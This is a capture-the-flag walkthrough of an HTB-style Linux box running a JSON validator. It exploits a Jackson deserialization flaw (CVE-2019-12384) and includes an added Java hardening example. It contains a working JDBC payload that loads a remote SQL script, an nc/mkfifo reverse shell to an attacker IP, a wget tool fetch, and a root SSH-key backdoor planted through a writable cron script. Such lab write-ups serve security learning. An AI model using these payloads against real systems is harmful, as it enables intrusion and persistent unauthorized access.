Basic information

Port scan

The usual 22 and 80:

$ nmap -sC -sV 10.10.10.214
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-29 14:53 CST
Nmap scan report for 10.10.10.214
Host is up (0.071s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
| 256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_ 256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds

80

The site is an online JSON beautifier & validator:

Jackson

The Validate feature is in beta; feeding it a few test inputs yields different error messages:

test
Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'test': was expecting 'null', 'true', 'false' or NaN

{"test"}
Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object

["test"]
Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.InvalidTypeIdException: Could not resolve type id 'test' as a subtype of [simple type, class java.lang.Object]: no such class found

This tells us the backend is Jackson, and the message "Could not resolve type id 'test'" shows that it is deserializing our input and treating the first element of the array as a type id.
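The error messages above come from Jackson's global default typing with `Object` as the base type, which lets the client name any class on the classpath in the wrapper array. The following added example (not code from the writeup or the target application) contrasts that vulnerable configuration with the Jackson 2.10+ `PolymorphicTypeValidator` allow-list fix; the package prefix `com.example.model.` is an assumption standing in for the application's own model package.

```java
import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class JacksonTypingDemo {

    // Vulnerable pattern: global default typing (OBJECT_AND_NON_CONCRETE with
    // WRAPPER_ARRAY). Any class on the classpath may be named as the type id,
    // which is what yields the "need JSON Array to contain As.WRAPPER_ARRAY"
    // and "Could not resolve type id" messages seen above.
    static ObjectMapper vulnerableMapper() {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // deprecated since Jackson 2.10
        return mapper;
    }

    // Hardened pattern: default typing is only activated behind a validator
    // that allow-lists the application's own package (assumed name here).
    // Type ids outside the list are refused before any class is loaded.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.model.")
                .build();
        ObjectMapper mapper = new ObjectMapper();
        mapper.activateDefaultTyping(ptv,
                ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE,
                JsonTypeInfo.As.WRAPPER_ARRAY);
        return mapper;
    }

    // True if the mapper resolved and instantiated the type id, false if refused.
    static boolean acceptsTypeId(ObjectMapper mapper, String json) {
        try {
            mapper.readValue(json, Object.class);
            return true;
        } catch (JsonProcessingException e) {
            System.out.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) {
        // Constructed input naming the gadget class from the writeup with an
        // empty body, so nothing is configured even where the class resolves.
        String gadget = "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {}]";
        System.out.println("vulnerable accepts: " + acceptsTypeId(vulnerableMapper(), gadget));
        System.out.println("hardened accepts:   " + acceptsTypeId(hardenedMapper(), gadget));
    }
}
```

With logback on the classpath the vulnerable mapper instantiates the named class, while the hardened mapper rejects the type id regardless of what is on the classpath.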

CVE-2019-12384

Searching for "jackson deserialization vulnerability" turns up CVE-2019-12384:

After that it is just a matter of running the exploit step by step:

exploit

[
"ch.qos.logback.core.db.DriverManagerConnectionSource",
{
"url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http:\/\/10.10.14.10:9999\/inject.sql'"
}
]

This gives a shell as pericles:

inject.sql

-- H2 user-defined function: runs the given command through bash and returns its output
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
-- invoke it to start the reverse shell
CALL SHELLEXEC('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 4445 >/tmp/f');

user flag

user.txt is on the pericles user's desktop:

To make the later steps easier, you can write your SSH public key into the account directly.

Privilege escalation enumeration

Running pspy shows that timer_backup.sh is executed periodically as root (UID=0), and the file is writable by us, so editing it lets us run arbitrary commands as root:

wget http://10.10.14.10:9999/pspy64

2020/10/29 07:19:31 CMD: UID=0 PID=6480 | /bin/bash /usr/bin/timer_backup.sh


pericles@time:~$ ls -al /usr/bin/timer_backup.sh
-rwxrw-rw- 1 pericles pericles 88 Oct 29 07:20 /usr/bin/timer_backup.sh

Privilege escalation

For example, append an SSH public key directly:

echo "echo SSH_PUB_KEY >> /root/.ssh/authorized_keys" >> /usr/bin/timer_backup.sh

Once the timer runs it, you can SSH in directly as root.

root flag

root.txt is in root's home directory:

References